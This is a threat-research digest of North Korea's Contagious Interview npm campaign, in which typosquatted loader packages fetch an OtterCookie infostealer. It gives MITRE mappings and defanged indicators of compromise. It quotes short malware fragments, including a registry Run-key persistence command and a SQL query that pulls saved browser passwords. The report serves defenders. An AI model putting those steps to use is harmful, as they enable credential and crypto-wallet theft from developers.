Threat Research

Inside the GitHub Infrastructure Powering North Korea’s Contagious Interview npm Attacks

SocketDev
Inside the GitHub Infrastructure Powering North Korea’s Contagious Interview npm Attacks

North Korean state-sponsored operators running the Contagious Interview campaign have injected at least 197 malicious npm packages that act as loaders to fetch OtterCookie payloads from a Vercel staging endpoint and a threat actor-controlled GitHub account. The campaign uses typosquatted utilities and polished crypto lures to deliver a multi-platform infostealer/RAT that targets developer systems and crypto wallets. #OtterCookie #ContagiousInterview

Keypoints

  • The Contagious Interview operation added at least 197 malicious npm packages and 31,000+ downloads, targeting blockchain/Web3 developers with fake job interviews and test assignments.
  • Multiple malicious npm packages (e.g., tailwind-magic, node-tailwind) act as import-time loaders that contact a Vercel staging server (tetrismic[.]vercel[.]app) to eval and execute returned JavaScript.
  • Analysis traced the loader packages to a threat actor GitHub account (stardev0914) and a delivery stack where GitHub hosts code, Vercel stages payloads, and a separate C2 (144[.]172[.]104[.]117) handles data collection and tasking.
  • The second-stage payload is an OtterCookie variant that performs VM/sandbox detection, host fingerprinting, long-lived C2, remote shell, clipboard theft, keylogging, multi-monitor screenshots, recursive filesystem scanning, and browser/wallet extension data theft across Windows, macOS, and Linux.
  • Threat actors used polished crypto-themed repositories and cloned DEX front-ends (e.g., dexproject / knightsbridge-dex) as lures that wire malicious npm dependencies into otherwise normal-looking projects.
  • Defensive recommendations: treat npm installs as RCE risk, pin dependencies and lockfiles, apply egress controls, require code review for templates, and integrate real-time package analysis and install-time behavioral checks.

MITRE Techniques

  • [T1583.001 ] Acquire Infrastructure: Domains – adversaries used hosted domains/services for staging and delivery (‘tetrismic[.]vercel[.]app’).
  • [T1583.006 ] Acquire Infrastructure: Web Services – Vercel was used to serve dynamic payloads (‘tetrismic[.]vercel[.]app/api/ipcheck’).
  • [T1585 ] Establish Accounts – threat actors maintained GitHub accounts and repositories to host deceptive projects (‘github[.]com/stardev0914’).
  • [T1587 ] Develop Capabilities – actors developed loader packages and OtterCookie variants as part of a custom delivery stack (‘OtterCookie malware’).
  • [T1587.001 ] Develop Capabilities: Malware – the campaign produced and iterated on OtterCookie/BeaverTail-like malware (‘OtterCookie version 4’).
  • [T1608.001 ] Stage Capabilities: Upload Malware – GitHub and Vercel deployments were used to stage and rotate payloads (’38 Vercel “Production” deployments’).
  • [T1195.002 ] Supply Chain Compromise: Compromise Software Supply Chain – npm packages typosquatted legitimate utilities to execute malicious postinstall/import-time code (‘tailwind-magic is a typosquatted and backdoored clone’).
  • [T1059.007 ] Command and Scripting Interpreter: JavaScript – arbitrary JavaScript returned by the staging server was eval()ed inside Node.js (‘eval the returned JavaScript’).
  • [T1204.002 ] User Execution: Malicious File – postinstall scripts executed malicious loader code at install time (‘postinstall script executes src/lib/index.js’).
  • [T1204.005 ] User Execution: Malicious Library – malicious libraries execute on import and provide RCE in developer environments (‘on import, POSTs the local package version … and evals the response’).
  • [T1547.001 ] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Windows persistence via Run registry entry (‘Adds a Run entry HKCUSoftwareMicrosoftWindowsCurrentVersionRun /v “NodeHelper”‘).
  • [T1546.016 ] Event Triggered Execution: Installer Packages – installer/postinstall behavior triggers remote loader execution (‘postinstall script executes src/lib/index.js’).
  • [T1036 ] Masquerading – typosquatting and cloned projects impersonate legitimate libraries and DEX front-ends (‘typosquatted fork of the legitimate tailwind-merge library’).
  • [T1497 ] Virtualization/Sandbox Evasion – the payload checks system vendor/profile and /proc/cpuinfo for hypervisor strings (‘wmic computersystem get model,manufacturer’ and ‘/proc/cpuinfo’ checks).
  • [T1656 ] Impersonation – use of polished crypto project branding and cloned DEX front-ends to impersonate legitimate projects (‘cloned Knightsbridge DEX front-end’).
  • [T1056.001 ] Input Capture: Keylogging – the implant uses GlobalKeyboardListener to capture system-wide keystrokes and exfiltrate them (‘GlobalKeyboardListener … to capture system-wide keystrokes’).
  • [T1539 ] Steal Web Session Cookie – browser session data and cookies are collected from Chrome/Brave profiles (‘Collection of browser credentials and wallet extension data from Chrome and Brave’).
  • [T1555.001 ] Credentials from Password Stores: Keychain – targeted collection from platform credential stores (implied by cross-platform credential harvesting). (‘Collection of browser credentials and wallet extension data’).
  • [T1555.003 ] Credentials from Password Stores: Credentials from Web Browsers – reading browser Login Data SQLite to extract stored credentials (‘SELECT origin_url, username_value, password_value FROM logins’).
  • [T1082 ] System Information Discovery – host fingerprinting and OS/platform enumeration are performed before C2 registration (‘Send host fingerprint and VM flag to C2’).
  • [T1083 ] File and Directory Discovery – recursive filesystem scans search for secrets and wallet-related files (‘recursive file-system search for secrets, wallets, and sensitive documents’).
  • [T1217 ] Browser Information Discovery – enumerates browser profiles and wallet extension IDs to harvest extensions data (‘targeted wallet extension IDs: …’).
  • [T1005 ] Data from Local System – the malware exfiltrates files and screenshots from the local system (‘uploads matching files to /total’).
  • [T1113 ] Screen Capture – multi-monitor screenshots are captured and exfiltrated (‘multi-monitor screenshot capture’).
  • [T1115 ] Clipboard Data – periodic clipboard reads and exfiltration are performed (‘Every 5s: read clipboard and POST { uid, clip, hostname } to /clip’).
  • [T1119 ] Automated Collection – background workers perform continuous credential harvesting and file collection (‘launches three parallel modules: Clipboard stealer, Keylogger, and Browser credential theft’).
  • [T1105 ] Ingress Tool Transfer – the initial npm packages fetch and execute secondary payloads from staging servers (‘nmp package extracts this field and executes it with eval()’).
  • [T1571 ] Non-Standard Port – C2 communication uses ports and explicit host/port combinations (e.g., ‘144[.]172[.]104[.]117:5918’).
  • [T1041 ] Exfiltration Over C2 Channel – collected data is uploaded to the C2 endpoints (e.g., ‘/upload’, ‘/total’).
  • [T1657 ] Financial Theft – targeted collection of wallet seed phrases, extensions, and credentials to drain digital assets (‘harvest credentials, seed phrases, wallet data, and sensitive documents’).

Indicators of Compromise

  • [Domain / Host ] staging and lure sites used for payload delivery and demos – tetrismic[.]vercel[.]app, knightsbridge-dex[.]vercel[.]app, and multiple other Vercel-hosted demo sites.
  • [IP Address ] primary C2 server and ports – 144[.]172[.]104[.]117, 144[.]172[.]104[.]117:5918 (C2 endpoints and API ports used for beaconing, commands, and uploads).
  • [URL / Endpoint ] payload fetch and C2 API paths – https://tetrismic[.]vercel[.]app/api/ipcheck, http://144[.]172[.]104[.]117:5918/api/service/process and other endpoints (/command, /output, /clip, /total, /upload).
  • [npm Package Names ] loader and malicious packages observed in the supply chain – tailwind-magic, node-tailwind, and many others (197+ malicious packages added since Oct 10, 2025, including node-tailwind-magic, react-modal-select, etc.).
  • [GitHub Account / Repositories ] threat actor infrastructure and code hosting – github[.]com/stardev0914 (stardev0914 account) and repositories such as tetrismic and tailwind-magic, among ~18 repositories).
  • [File Paths / Filenames ] loader and payload artifacts referenced in packages – dist/ (exported module), src/lib/index.js (postinstall loader), main.js (staging payload file) and Login Data (browser SQLite DB file).
  • [Email Addresses / Aliases ] numerous throwaway aliases observed as npm/publishing/registration artifacts – examples: abigailzebrairses36717@outlook[.]com, alex9901@… and many other alias addresses (dozens listed in artifacts).

Read more: https://socket.dev/blog/north-korea-contagious-interview-npm-attacks

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint